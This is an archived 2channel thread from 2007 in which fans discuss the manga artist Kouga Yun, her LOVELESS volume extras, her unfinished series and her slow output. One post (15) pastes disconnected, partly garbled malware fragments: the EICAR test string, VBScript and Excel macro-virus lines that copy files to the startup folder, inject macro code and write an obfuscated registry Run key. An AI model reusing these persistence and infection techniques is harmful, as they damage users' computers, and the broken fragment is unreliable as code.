2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【LOVELESS】高河ゆん27【天使庁】

1 :花と名無しさん:2007/11/19(月) 20:48:06 ID:0M83Hu7q0
高河ゆんオフィシャルサイト:九重.com
ttp://www.kokonoe.com/
一迅社WEBサイト
ttp://www.ichijinsha.co.jp/

KDDI au「LOVELESS」携帯サイト
ttp://www.spaceout.jp/ezweb_loveless.html
NTT DoCoMo『モビ★ぷり』「LOVELESS」携帯サイト
ttp://www.spaceout.jp/mobipuri/pr/loveless/index.html
Vodafone live!モバイルドラマ配信
ttp://www.spaceout.jp/voda_mobidora.html

(視聴無料)プロモーション映像/第1話「BREATHLESS」
ttp://animejapan.cplaza.ne.jp/b-ch/loveless_tva/loveless_tva.html

前スレ
【LOVELESS】高河ゆん26【天使庁】
ttp://anime2.2ch.net/test/read.cgi/gcomic/1189858006/

アニメスレ
LOVELESS Ep.20-ENDLESS-
ttp://anime2.2ch.net/test/read.cgi/anime2/1159664879/

過去スレ、関連情報とか>>2-10くらい

ガンダムOO関係は該当スレを探してそちらへどうぞ

2 :花と名無しさん:2007/11/19(月) 20:49:19 ID:???0
過去スレ
1.ttp://piza.2ch.net/gcomic/kako/956/956347583.html
2.ttp://salad.2ch.net/gcomic/kako/974/974712652.html
3.ttp://salad.2ch.net/gcomic/kako/978/978365455.html
4.ttp://salad.2ch.net/gcomic/kako/989/989505875.html
5.ttp://choco.2ch.net/gcomic/kako/993/993376754.html
6.ttp://comic.2ch.net/gcomic/kako/1004/10041/1004166949.html
7.ttp://comic.2ch.net/test/read.cgi/gcomic/1012053219/ (html化待ち)
8.ttp://comic.2ch.net/gcomic/kako/1022/10228/1022881019.html
9.ttp://comic.2ch.net/gcomic/kako/1030/10306/1030667381.html
10.ttp://comic.2ch.net/gcomic/kako/1037/10370/1037009068.html
11.ttp://comic.2ch.net/gcomic/kako/1041/10416/1041654125.html
12.ttp://comic.2ch.net/test/read.cgi/gcomic/1048762936/ (html化待ち)
13.ttp://comic.2ch.net/test/read.cgi/gcomic/1059559273/ (html化待ち)
14.ttp://comic6.2ch.net/test/read.cgi/gcomic/1076676438 (html化待ち)
15.ttp://comic6.2ch.net/test/read.cgi/gcomic/1093829751/ (html化待ち)
16.ttp://comic6.2ch.net/test/read.cgi/gcomic/1109225913/ (html化待ち)
17.ttp://comic6.2ch.net/test/read.cgi/gcomic/1116853618/ (html化待ち)
18.ttp://comic6.2ch.net/test/read.cgi/gcomic/1121822586/ (html化待ち)
19.ttp://comic6.2ch.net/test/read.cgi/gcomic/1129778183/
20.ttp://comic6.2ch.net/test/read.cgi/gcomic/1137964731/
21.ttp://comic6.2ch.net/test/read.cgi/gcomic/1146188640/
22.ttp://comic6.2ch.net/test/read.cgi/gcomic/1155505270/
23.ttp://anime2.2ch.net/test/read.cgi/gcomic/1166287184/
24.ttp://anime2.2ch.net/test/read.cgi/gcomic/1176826059/
25.ttp://anime2.2ch.net/test/read.cgi/gcomic/1183560219/

3 :花と名無しさん:2007/11/19(月) 20:51:30 ID:???0
【完結済み】
若草物語       マインドサイズ
ローラカイザー    子供たちは夜の住人
飢餓一族       アーシアン
妖精事件       超獣伝説ゲシュタルト
LA VIE EN ROSE
はぴぷり はっぴーなぷりてぃちゃん
You're My Only Shinin' Star 君はぼくの輝ける星
恋愛−CROWN−
サフラン・ゼロ・ビート
REN-AI 恋愛

【未完】
夜嬢帝国       源氏
B型同盟        超進化エナス
CAROL−K       クロニクル
ありす IN WONDERLAND

【連載中】
LOVELESS
佐藤くんと田中さん -The blood highschool (WARD Vol.17から新連載、WARD Vol.18休載)
天使庁(WARD Vol.17から休載)
KILL ME(掲載誌がビブロス→ リブレに移行してからの詳細不明)

※ 短編集や読み切りやエッセイ集などは含んでません

4 :花と名無しさん:2007/11/19(月) 20:52:39 ID:???0
【LOVELESSコミックス初回版】
表紙*絵柄は一緒ですがカラーが違います
特典*限定冊子、クリアファイル、交換日記など
帯  *初回版には帯がありません

【耳・尻尾落ちについて】
同姓異性問わず自分はセクースをやった、やられた
処女童貞じゃなくなってしまった、と自覚したときに落ちる。
落ちた耳は記念にとっておく人もいる模様。そのときの形状は不明。

5 :花と名無しさん:2007/11/19(月) 20:53:47 ID:???0
((一巻))
○表紙 立夏と草灯の絡みカラーイラスト(草灯ツケミミ付き)
○裏表紙 表表紙の立夏アップ
○中表紙 立夏イラスト
○前書き 立夏と草灯ラフイラストの上に高河ゆんの文 1p
○プロフィール 草灯 1p 立夏 1p
○肉筆対談 担当vs作者 1p
○寄稿イラスト 峰倉かずや 1p なるしまゆり 1p
立夏と草灯ラフイラスト上に高河ゆんの礼の文 1p
○漫画16p ユイコの家で立夏、草灯、ユイコがすごす
((二巻))
○表紙/裏表紙 立夏と草灯の絡みカラーイラスト(一枚絵)
○前書き 二コマ漫画 1p
○イラスト立夏と草灯の絡み 見開き2p
○三コマ漫画×3 3p
○肉筆対談 担当vs作者 1p
○寄稿パロ小説2p 立夏に会うまでの草灯
○三コマ漫画 1p
○漫画12p 立夏とユイコの学校ほのぼの
○イラスト1p 立夏
○奥付け 高河ゆんの文とちょっと漫画
((三巻))
○表紙/裏表紙 寝そべってる立夏と草灯カラーイラスト(一枚絵)
○中表紙 立夏17才イラスト 1p
○「草灯と立夏に一問一答!」 文章形式 4p
○パロ四コマ漫画4p
立夏と草灯とユイコと奈津生と瑶二が同じ小学校の同学年
○イラスト 17才立夏×12才草灯 1p
○肉筆対談 担当vs作者 1p
○漫画11p 立夏と草灯が一緒のベッドで寝る
○後書き 高河ゆんの文 1p
○奥付け 草灯12才イラスト

6 :花と名無しさん:2007/11/19(月) 20:54:55 ID:???0
((四巻))
○表紙 立夏カラーイラスト
○中表紙 立夏イラスト
○イラスト 奈津生と瑶二 見開き2p
○前書き 草灯ラフイラストの上に高河ゆんの文 1p
○パロ二コマ〜八コマ漫画5p 「5匹の立夏」
○漫画3p 「キオちゃんピアス講座」
○漫画6p 立夏と草灯の散歩
○肉筆対談 担当vs作者 1p
○交換日記 作者1p 担当1p
○イラスト ヤマトと江夜 見開き2p
((五巻))
○表紙 立夏カラーイラスト
○裏表紙 草灯カラーイラスト
○中表紙 立夏イラスト
○イラスト 渚 1p
○前書き 高河ゆんの文 1p
○漫画2p 草灯と天使庁のキャラとの「お料理教室」
○イラスト 7 1p
○パロ漫画14p 立夏の誕生日
○イラスト 立夏と草灯 1p
○肉筆対談 担当vs作者 1p
○イラスト 律 1p
○奥付け 清明イラス

7 :花と名無しさん:2007/11/19(月) 20:58:57 ID:???0
((六巻))
○表紙 立夏と草灯の絡みカラーイラスト
○裏表紙 表表紙の立夏の尻のアップのカラーイラスト
○中表紙 立夏イラスト
○イラスト 貴緒イラスト 1p
○前書き 高河ゆんの文 1p
○寄稿イラスト 高遠るい 1p  
○シンシアザミッションのシンシアと立夏イラストに高河ゆんのお礼文 1p 
○寄稿イラスト 三輪士郎 1p
○DOGSのバドーと草灯のイラストに高河ゆんのお礼文 1p
○イラスト 奈津生と瑶二 1p
○漫画12p はじめての飲酒。
○肉筆対談 担当vs作者 1p
○イラスト 立夏と草灯 見開き 2p
○奥付け 立夏と草灯(BLOOD+の小夜とハジのコスプレ)
((七巻))
○表紙&裏表紙 草灯と赤い羽根の付いた(?)服を着た立夏(1枚絵)
○中表紙 ハートから何かが滴るロゴマークに「loveless 0000007」の字
○イラスト 寝転ぶ立夏の前に女の足 見開き2p
○イラスト 奈津生と瑶二と二世 1p
○写真 7巻修正の為に作られたアシ作チェック表 1p
○漫画10p GOOD NIGHT BABY
○写真 7巻の為に作られた作者作のメモ 1p
○肉筆対談 担当vs作者 1p
○イラスト 寝転ぶ草灯の前に女の足 見開き 2p
○奥付け ハートから何かが滴るロゴマークに「loveless 0000007」の字 アゲイン

8 :花と名無しさん:2007/11/19(月) 21:08:12 ID:???0
>>1
乙で         *、 *、      。*゜    *-+。・+。-*。+。*
        / ゜+、 ゜+、   *゜ ・゜    \       。*゜
       ∩    *。  *。    +゜    ∩    *
   (´.ω.`)      +。   +。   ゜*     (´.ω.`)
   と   ノ      *゜  *゜    ・     。ヽ、  つ
    と、ノ     ・゜  ・゜     +゜    *  ヽ、 ⊃
     ~∪    *゜  *゜      *    +゜    ∪~   ☆
          +′ +′      +゜   ゜+。*。・+。-*。+。*゜ す



9 :花と名無しさん:2007/11/19(月) 21:10:18 ID:???0
うわ、失敗スマソ

         *、 *、      。*゜    *-+。・+。-*。+。*
        / ゜+、 ゜+、   *゜ ・゜    \       。*゜
       ∩    *。  *。    +゜    ∩    *
   (´.ω.`)      +。   +。   ゜*     (´.ω.`)
   と   ノ      *゜  *゜    ・     。ヽ、  つ
    と、ノ     ・゜  ・゜     +゜    *  ヽ、 ⊃
     ~∪    *゜  *゜      *    +゜    ∪~   ☆
          +′ +′      +゜   ゜+。*。・+。-*。+。*゜

10 :花と名無しさん:2007/11/19(月) 22:02:17 ID:???O
>>1乙
前スレ1001がスレの総意をまとめてるw

11 :花と名無しさん:2007/11/19(月) 22:02:40 ID:???0
携帯 コミックZERO-SUM
ttp://www.ichijinsha.co.jp/i/
編集長日記
ttp://spn00384-02.hontsuna.net/


12 :花と名無しさん:2007/11/19(月) 22:06:19 ID:???0
コミックゼロサムCDコレクション(一般流通版)

2007/10/24 ドラマCD Vol.1
ttp://www.fwinc.co.jp/package/FCCC-0076.php
ttp://shop.frontierworks.jp/detail.asp?merchcd=FCCC-0076

2007/10/24 ドラマCD Vol.2
http://www.fwinc.co.jp/package/FCCC-0077.php
http://shop.frontierworks.jp/detail.asp?merchcd=FCCC-0077

2007/11/21 ドラマCD Vol.3
ttp://www.fwinc.co.jp/package/FCCC-0099.php
ttp://shop.frontierworks.jp/detail.asp?merchcd=FCCC-0099

2007/11/21 ドラマCD Vol.4
ttp://www.fwinc.co.jp/package/FCCC-0100.php
ttp://shop.frontierworks.jp/detail.asp?merchcd=FCCC-0100

2007/12/21 ドラマCD Vol.5
ttp://shop.frontierworks.jp/detail.asp?merchcd=FCCC-0101




13 :花と名無しさん:2007/11/19(月) 22:08:04 ID:???0
電子書籍

eBookJapan
妖精事件 全5巻 (全巻冒頭部分の立ち読み可能)
ttp://www.ebookjapan.jp/shop/title.asp?titleid=9277&genreid=28002

Timebook Town
妖精事件 全5巻 (全巻冒頭部分の立ち読み可能)
ttp://www.timebooktown.jp/Service/base/yousei.asp

ビットウェイ コミックス
妖精事件 全5巻 
ttp://comic.bitway.ne.jp/cp/comic/103_01_01.html?TID=T00000595&SID=10fe293d494ffb51342c476796f2407b

Yahoo!コミック
妖精事件 全5巻 (全巻15ページ立ち読み可能)
ttp://comics.yahoo.co.jp/bin/search?p=%B9%E2%B2%CF%A4%E6%A4%F3

楽天ダウンロード
妖精事件 全5巻
ttp://dl.rakuten.co.jp/attr/92192139/da30_1.html


14 :花と名無しさん:2007/11/19(月) 22:11:23 ID:???0
ttp://manganohi.jp/2007/10/8507.html
創美社コミック文庫
『アーシアン 1』
■出版社: 集英社
■著者名: 高河 ゆん・著者
■ISBNコード: 9784420250085
■判型/頁 : 文庫判 /292頁
■定価: 630円(税込)
■発売日: 2007/10/18

ttp://manganohi.jp/2007/10/8506.html
創美社コミック文庫
『アーシアン 2』
■出版社: 集英社
■著者名: 高河 ゆん・著者
■ISBNコード: 9784420250092
■判型/頁 : 文庫判 /292頁
■定価: 630円(税込)
■発売日: 2007/10/18

15 :花と名無しさん:2007/11/19(月) 23:19:00 ID:???0
Set A4 = A1.CreateTextFile(A1.BuildPath(A1. 1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo ", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1. (BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E. 1), A("VHORU@SU/WCR"))
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kak\ \';\ken=\wd+'\START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
whichfile = p + w * 10
End Sub


16 :花と名無しさん:2007/11/19(月) 23:27:24 ID:???0
創美社 既刊案内
ttp://crimson.shueisha.co.jp/sobisha/pages/body/04/01-kouga.html

学研 作品紹介
ttp://kids.gakken.co.jp/hanamaru/hapipri/hapipri.html


17 :花と名無しさん:2007/11/19(月) 23:37:14 ID:???0
11以降もテンプレにすんの?いらんのよねこの手の情報。

18 :花と名無しさん:2007/11/19(月) 23:45:28 ID:???0
いらねーな
いくら張られても買う気ねーし

19 :花と名無しさん:2007/11/20(火) 00:02:32 ID:???O
>>11>>16
>>1に入れちゃえばいいと思う

20 :花と名無しさん:2007/11/20(火) 00:24:55 ID:???0
呼びかけられても知らん振りで
他人に立ててもらったくせにぐだぐだ言うなよ

21 :花と名無しさん:2007/11/20(火) 00:31:41 ID:???0
むしろ天麩羅は>>3だけあればいい

22 :花と名無しさん:2007/11/20(火) 00:40:32 ID:???0
 / ̄/\/\       ____     _| ̄□__
 \  .\  \. \    /.  .|   |     |_  _|へ ̄\
   ∧∧.\.  \. \ .  ̄|.   |.   . |     |  |_ ゝ__)__)  | ̄ ̄ ̄ ̄ヽ ̄ヽ
  (゚听,,)/  ./ ./    .|.   |(,,゚听)    /     .\(,,゚听)  ̄ ̄ ヽ  ,|(,,゚听)
 / /ヽ) / ./     _|. (ノ|__|)  ( o | ̄丶.(ノ|  .|)    _.ノ (ノノ  ノ)
 \_\/\/     |.___.|__|  .ヽ_ノ_ノ_ノ__ノ    |__ノ__ノ
   し`J                し`J            し`J          し`J


23 :花と名無しさん:2007/11/20(火) 01:08:11 ID:???O
>>21
限定版小冊子情報は
あとからハマッた人に質問されたら
「>>4->>7見れ」ですむから便利だよ

24 :花と名無しさん:2007/11/20(火) 01:15:41 ID:???0
>>7までは普通に全部いる。
出版物とかCDとかへのリンクは書き出したらキリないからいらない。

25 :花と名無しさん:2007/11/20(火) 02:02:43 ID:???O
料理やグルメ漫画ではない漫画でやたら食べ物の描写したり固有名詞出したりする女性作家は自己主張が強いのが多い。
同人出身に多い。
…気がする。

26 :花と名無しさん:2007/11/20(火) 02:25:21 ID:???0
すげー偏見・・・

27 :花と名無しさん:2007/11/20(火) 02:40:57 ID:???0
偏見すぎてワロタw
食べ物描写は作者がなんか食べ物かいといてって指定しただけで
アシさんが勝手に描く場合多いしw

28 :花と名無しさん:2007/11/20(火) 10:30:12 ID:???0
食べ物に関して蘊蓄入れたがる作家は自己主張強いってのはあるかもね
食事シーンが頻発するのは手法として避けた方が良いとは言われているけどさ

29 :花と名無しさん:2007/11/20(火) 11:31:57 ID:EQv1XzPMO
>食べ物に関して蘊蓄入れたがる作家は自己主張強いってのはあるかも

高橋克彦(小説家)を思い出した
この人も結構飲み食いシーンにページ割くんだよな

30 :花と名無しさん:2007/11/20(火) 11:58:39 ID:???0
スレ違いだが食べ物薀蓄が好きな人は北村薫の円紫師匠シリーズがお勧めだ
おいしそうだ
描写がうまい人はうまいけど、がゆんの場合は単にネタがなくて無理矢理入れてる
だけな気がする

31 :花と名無しさん:2007/11/20(火) 11:59:41 ID:???O
偏見すぎる25だが、よしながふみとかが似たタイプかなーと思って書いた。
微妙に羽海野チカとか、小説の江國香織とかそのへん。
偏見すぎスマンww

32 :花と名無しさん:2007/11/20(火) 12:40:31 ID:???0
小説に多いけど食べ物でやたらとオシャレ用語と蘊蓄
並べまくるのはそういう人かなと私も思ってたw
しかも、みんな普段から食べてるし知ってるでしょーって雰囲気で。
ゼロサムなら破天荒遊戯もそんな感じ。

33 :花と名無しさん:2007/11/20(火) 12:43:55 ID:???0
自分のグルメ度をしらしめたいという幼稚な願望の露出です

34 :花と名無しさん:2007/11/20(火) 13:41:19 ID:???0
既に業界じゃ鼻つまみ者だと

35 :花と名無しさん:2007/11/20(火) 13:50:53 ID:???O
おまいらまとめて村上春樹に謝れw

36 :花と名無しさん:2007/11/20(火) 13:56:09 ID:???O
豚切失礼

確か数スレ前からずっと取り溢されてて惜しいんだ
>>6の最後の一字が

○奥付け 清明イラス

37 :花と名無しさん:2007/11/20(火) 13:58:46 ID:???0
>>32で若木未生のプリンがどーたらとかを思い出した

38 :花と名無しさん:2007/11/20(火) 20:41:45 ID:???0
>>35
あの人の書くサンドイッチが食いたい

39 :花と名無しさん:2007/11/20(火) 20:43:05 ID:???O
この人の扉とか表紙、シチュエーションとか意味分かんないかとがが結構あると思うんだけど、自分的に1番「……?」なのが旧版妖精事件の4巻。
右は誰(じゅりあ?)でその状況?ポーズ?の意味するところはなんなんだか誰か教えて下さい。抽象的な感じでいいので。

40 :花と名無しさん:2007/11/20(火) 21:52:28 ID:???0
前スレ979さんへ

ペーパーらしいものはなかったよ。
ただ、入っているものを確認してください、的な事務的なペーパーだよ。

41 :花と名無しさん:2007/11/20(火) 22:33:11 ID:???0
>>39
考えるな、感じるんだ

42 :前スレ979:2007/11/20(火) 23:05:14 ID:???O
>>40
トンです!
自分は全サ応募組だったんですが、お詫びペーパーは同封物の羅列と、活字の言葉のみでした。
モノクロイラストくらい描き添えてくれてるかと思ってたんですけどね…。


43 :花と名無しさん:2007/11/20(火) 23:35:52 ID:???0
スイーツ(笑)みたいなもんなんじゃないの
食の薀蓄

44 :花と名無しさん:2007/11/21(水) 01:05:32 ID:???O
高河先生は相変わらず休み癖が抜けてないんだな…。単行本でしかチェックしてないから実感ないけど。しかしゲシュタルト連載時くらいからの新参なんでいまいち昔の作品が入手できない…。源氏とか…。

45 :花と名無しさん:2007/11/21(水) 12:51:30 ID:???0
ブコフとかにない?

46 :花と名無しさん:2007/11/21(水) 21:44:21 ID:???0
一時、近所のブコフに行けば、源氏、アーシアンは揃ってたが、
あまりに売れなくてどんどん黄ばみつか、茶色くなっていったせいか
棚から姿を消しました。


47 :花と名無しさん:2007/11/21(水) 22:35:34 ID:???O
>>45
ないんだよなぁ…。近所のブクフにはサフランゼロビートが4冊あるけど。

48 :花と名無しさん:2007/11/21(水) 22:48:07 ID:???O
>>45
ないんだよなぁ…。近所のブクフには何故かサフランゼロビートだけが4冊ある。

49 :花と名無しさん:2007/11/21(水) 22:53:21 ID:???0
ブコフはオンライン書店もあるよ
あと奥にもたくさんでてる

50 :花と名無しさん:2007/11/21(水) 22:58:05 ID:???0
本当に欲しいならそんなに入手むずかしくないよ。
そんなに頑張ってまで欲しくないんでしょ。
完結してないし源氏なんて読まなくていいよ、ストレスたまるだけだから。

51 :花と名無しさん:2007/11/21(水) 23:45:26 ID:???0
海尊の目が好きだったなあ


52 :花と名無しさん:2007/11/22(木) 02:32:44 ID:???0
源氏は背表紙が金色のやつだけ買えばいいと思うんだ

53 :花と名無しさん:2007/11/22(木) 19:32:44 ID:???0
あのさ、頼朝って義経にやられたの?
なんか最初のほうに「こんな目に遭ってどうたらこうたら…女ではないんだぞ」っていう
セリフ付きの回想シーンがあったからずっと気になってた
それとも単純にあれは負け戦のこと言ってたのかな


54 :花と名無しさん:2007/11/22(木) 20:11:45 ID:???0
あれは頼朝ならこう言うに違いない!って妄想ではないかなー
義経はずっと手を出せなかったんじゃない?

55 :花と名無しさん:2007/11/22(木) 20:47:14 ID:???0
>>54
ああそうなのか
さすがにいくら好きでも大将の頼朝はやれないよね
克己がくるまで誰が義経の相手してたんだろう

56 :花と名無しさん:2007/11/22(木) 21:14:07 ID:???0
次のゼロサムはちゃんと描けましたって言ってるけど
何ページだろwww50ページ位かな( ^ω^ )

それにしても8巻発売決まったっぽいね

57 :花と名無しさん:2007/11/22(木) 21:38:03 ID:???0
へえ、久々に良い話題。「ちゃんと」って16Pくらいあるのかな?
未収録を恐れて雑誌買ってたけど、8巻に無事収録されそうだね。
あとは、無事にLOVELESSが終わってくれれば。
その後でいいから天使庁復活希望。

58 :花と名無しさん:2007/11/22(木) 22:04:48 ID:???0
増ページで「頑張っている」にかなり入る人に対して
「LOVELESS完結」と「天使庁連載復活」はハードルが高いなww

59 :花と名無しさん:2007/11/22(木) 22:08:27 ID:???0
月刊なんだからちゃんと描けたってんだから30ページは越してると思う。
佐藤くんはもう無かった事にしてくれていいです。

60 :花と名無しさん:2007/11/22(木) 22:28:18 ID:???0
30Pかあ…最近のがゆんの「ちゃんと」は「落とさなかった」程度の
意味なんじゃないかと思ってる…実際のページ数は数日後に分かるね。

61 :花と名無しさん:2007/11/22(木) 23:27:04 ID:???0
最低24Pでお願いします。
しかし、普段は「ちゃんと」描けてないプロの漫画家って・・・。

62 :花と名無しさん:2007/11/22(木) 23:34:36 ID:???0
16Pあったら「すごい」と思ってしまいそう。
単行本、一年ぶりかな?出るのはめでたい。とら・メイト特典ってあるかな。

63 :花と名無しさん:2007/11/23(金) 10:36:36 ID:???0
>>60
実際のページ数・・・10pと予想

64 :花と名無しさん:2007/11/23(金) 14:25:34 ID:???O
さりげなく清明を匿ってた奥様のボディーガードの中平?が好きだった…
性格と耳付きなところが萌える。

65 :花と名無しさん:2007/11/23(金) 15:19:47 ID:???0
ちょっと影艶を思い出したなー。中平の性格。耳あったねw

LOVELESSはもう締めに入ってほしいんだけど(ヤマ場にもきたし)
立夏の人格交替、勝子先生、キオ、清明の処刑役4番あたりは
放置されそう… 人格交替はこれから説明があるんだろうか。

66 :花と名無しさん:2007/11/23(金) 19:28:37 ID:???0
源氏って桜が邪魔だったねえw魅力ゼロで

67 :花と名無しさん:2007/11/23(金) 20:38:19 ID:???0
なんで克己があんなに桜LOVEだったのか
いまだによくわからん
子供の独占欲みたいなもんかな
パッとしない桜より、バリバリ仕事して男と渡り合ってたバビロンの周子が
魅力的で好きだったよ


68 :花と名無しさん:2007/11/23(金) 20:40:07 ID:???0
全員キモかった>源氏
弁慶のトーン髪だけ好きだったw

69 :花と名無しさん:2007/11/23(金) 21:52:52 ID:???0
高河ゆんってほんと完結させられない漫画家だよね

70 :花と名無しさん:2007/11/23(金) 22:40:25 ID:???0
桜は記憶喪失以前と以後で人格違うから良く分からん
更に第二期でもまた性格変わってるし

71 :花と名無しさん:2007/11/23(金) 22:45:56 ID:???0
桜の何がつまらんってキャラもだけどあの外見

72 :花と名無しさん:2007/11/23(金) 23:11:04 ID:???0
SSSであやとケーキ作ってた桜は良かった

73 :花と名無しさん:2007/11/23(金) 23:16:15 ID:???0
無個性でつまらんよね。

74 :花と名無しさん:2007/11/24(土) 00:11:40 ID:???0
外見はあんなもんじゃね
あやだってあんなもんじゃん

75 :花と名無しさん:2007/11/24(土) 00:55:01 ID:???0
とりあえず桜を好きだと自己主張しておこう。

76 :花と名無しさん:2007/11/24(土) 01:06:10 ID:???0
プ

77 :花と名無しさん:2007/11/24(土) 02:08:05 ID:???0
周子って鎧師の人だっけ?
あの人はかっこよかった!

78 :花と名無しさん:2007/11/24(土) 02:45:43 ID:???0
周子ってちょっとタレ目で細かい三つ編みヘアの人だよな
弁慶の女だよな

やっぱり背表紙が金より朱色のときのほうが全体的に好きかな

79 :花と名無しさん:2007/11/24(土) 10:22:19 ID:???0
久々にOVAアーシアン見た
孝子かわいいよ孝子

80 :花と名無しさん:2007/11/24(土) 16:22:14 ID:???0
今月号18Pとのこと。うーん「ちゃんと描いた」範囲なのか?
ここ最近でいえば多いほう…と言えるのか…
予想してた16Pよりは2P多いw

81 :花と名無しさん:2007/11/24(土) 16:43:59 ID:???0
>>80
うーん、微妙。
自分から「ちゃんと描いた」というなら24Pは欲しい所。
本来、月刊誌なら32Pあるのが普通だと思うんだけどね。

誰かが数ページずつしか描かないような連載ばっかりじゃ
漫画雑誌が売れる訳がない。って言っていたなぁ。
子供の頃読んでいた漫画雑誌はどの連載も毎号、笑い所・泣き所があって
読後の満足感もあるし引きも上手いから
続きが気になって買わずにいられなかったものだけど。

82 :花と名無しさん:2007/11/24(土) 19:23:41 ID:???0
18ページでちゃんと描けたとかよく言えるな。
もうこれが限界って事ね、アホくさ。
本当に早く終わってくれ。

83 :花と名無しさん:2007/11/24(土) 19:26:53 ID:???O
気狂いがいるな

84 :花と名無しさん:2007/11/24(土) 19:41:58 ID:???O
作家本人が18Pで「ちゃんと描いた」と思ってる時点でダメダメだろう。
週刊や隔週ならともかく、月刊でWARD全落ちの後で。


85 :花と名無しさん:2007/11/24(土) 19:51:17 ID:???0
まあ、これ以上甘やかす気にはなれんわな。

86 :花と名無しさん:2007/11/24(土) 19:55:34 ID:???0
この人の仕事っぷりを誉められるなら>>83のが気狂いだろ

87 :花と名無しさん:2007/11/24(土) 20:04:37 ID:???0
昔のナルト本を見てみた。気合い入ってて仕上げもキレイで
内容にも力はいってる。それと今の原稿を比べると…悲しくなってくる。
ちょっと載ってるだけでありがたがってちゃダメだね…。
今の絵もいいけれど、線は荒くてトーンもろくに貼られてない。

本人は「ちゃんと描きました」レベルだと思ってるのがなあ…

88 :花と名無しさん:2007/11/25(日) 12:02:08 ID:???0
ラブレス単行本の直しをしているんだと思って耐えたい

89 :花と名無しさん:2007/11/25(日) 17:30:24 ID:???0
そうだね。7巻は単行本の際にかなりトーンや背景を足してたから、
8巻もそうなっててほしい。久しぶりの単行本はやっぱり嬉しいな。

90 :花と名無しさん:2007/11/26(月) 13:35:25 ID:???O
8巻やっとだな。待ちくたびれたよ。

91 :花と名無しさん:2007/11/26(月) 20:43:22 ID:???0
で、それはいつなのかね?

92 :花と名無しさん:2007/11/26(月) 23:09:11 ID:???O
ゼロサムの漫画買ったらチラシ入ってたんだけどそこには通常限定共に2月25日発売って書いてある。
最近LOVELESSの動向を全くチェックしてなかったんだが仕事量は相変わらずみたいだね。

93 :花と名無しさん:2007/11/26(月) 23:53:07 ID:???0
2月下旬とか・・・仕事遅いってレベルじゃねーぞw
大幅修正してるとしてもがゆんクオリティが遺憾なく発揮されてる

94 :花と名無しさん :2007/11/27(火) 06:16:01 ID:???0
8巻出るんだね…
でも話がまったく進んでないから楽しみさがイマイチわいてこない
七声学園での一夜にもう1年以上かかってない?(まちがってたらスマソ)
いいかげん先に進んでくれないかな〜

95 :花と名無しさん:2007/11/27(火) 18:55:37 ID:???0
一夜に一年ワロタw


96 :花と名無しさん:2007/11/27(火) 20:11:12 ID:???0
一夜というか数時間

97 :花と名無しさん :2007/11/27(火) 20:22:26 ID:???0
よくよく見たら1年どころか2年近かった。
どんだけ…orz

98 :花と名無しさん:2007/11/27(火) 22:22:08 ID:???0
というか、何ヶ月も図書室にいるよね…
今月の18Pでいよいよ進展してくれるかな?
戦闘始まるのかな。がゆんも飽きてるようだから、締めに
入ってほしいよ。そうすれば未完にならずにすむ。

減ページ休載連発するくらいなら、一度休んでからまた
バリバリ描いてくれるほうがいいなあ。絵も荒くなったし…

99 :花と名無しさん:2007/11/27(火) 22:40:58 ID:???0
TV番組の収録は一度に2本撮りすることが多いそうだけれど
がゆんも2本描き(まとめて2ヶ月分ずつ仕上げる)すればいいんじゃないかと思う。
そういう仕事配分の方が性格上、あってそうだと思うんだけどな。

100 :花と名無しさん:2007/11/27(火) 22:52:47 ID:???0
8Pと8Pで計16P二か月分

101 :花と名無しさん:2007/11/27(火) 23:03:26 ID:???0
うわああああ
なんて仕事の仕方だ

102 :花と名無しさん:2007/11/28(水) 07:51:06 ID:???0
完結したら読むことにしますw
あとはみんなに任せた

103 :花と名無しさん:2007/11/28(水) 11:24:32 ID:???0
>>100
ちょっw・・・せめて16P+16P=32Pでお願いします。
2ヶ月に一度締め切りがやってきて32P仕上げるならペース配分的に悪くない気はする。
でもそれが出来るくらいならこんなことになっていないか。orz

104 :花と名無しさん:2007/11/28(水) 12:31:56 ID:???O
今月の話なんで一応改行



渚先生の、「こっちも確保してる奴の戦闘機」って誰のこと?
二世?草灯?
あと今月のヒキはキオが心配。
ていうか、もう清明帰さないでこの流れで終わらせて欲しかったな。
面白かったは面白かったけどさ。

ていうか作者コメント、いいから予防接種しろよと思った。落とすとかそういうことへの心配は皆無なのか…?この人言うほど漫画描くの好きじゃないんだと思った。散々自分には漫画!みたいなこと言うけど、こんだけ描ききれないなら向いてねーよw

105 :花と名無しさん:2007/11/28(水) 15:15:05 ID:???0
amazonのレビューみてたんだが、愛無の7巻限定版のレビュー。
なんかみんな、褒めつつも何かしら冷静というか冷めたコメントつけててワロタ

106 :花と名無しさん:2007/11/28(水) 21:30:56 ID:???0
>>104
二世しかいない。

107 :花と名無しさん :2007/11/29(木) 03:18:10 ID:???0
>104
今月号いま読んできた


本当だ〜なんかキオにヤバイフラグが立った気ガス…orz
まだなんの活躍もしてないのにカワイソス(ノД`)



108 :花と名無しさん:2007/11/29(木) 07:44:56 ID:???O
昔日記で誰が死んで誰が生き残るか決めた、みたいなこと書いてたのが心配…。
キオとユイコがこの漫画の良心なのに…。
ていうか人死にとか出る漫画だったのかと当時日記読んで思った。

109 :花と名無しさん:2007/11/29(木) 08:06:30 ID:???O
この流れを受けてななつの月4番はキオ説を再燃させたいオレ参上

110 :花と名無しさん:2007/11/29(木) 10:53:39 ID:???O
アーシアン買おうかと思ってるんだけど、どう?
ちなみに私17歳なんだけど、読めるかな?

111 :花と名無しさん:2007/11/29(木) 11:43:36 ID:???0
>>110
日本語わかれば読めると思うよ

112 :花と名無しさん:2007/11/29(木) 12:14:45 ID:???0


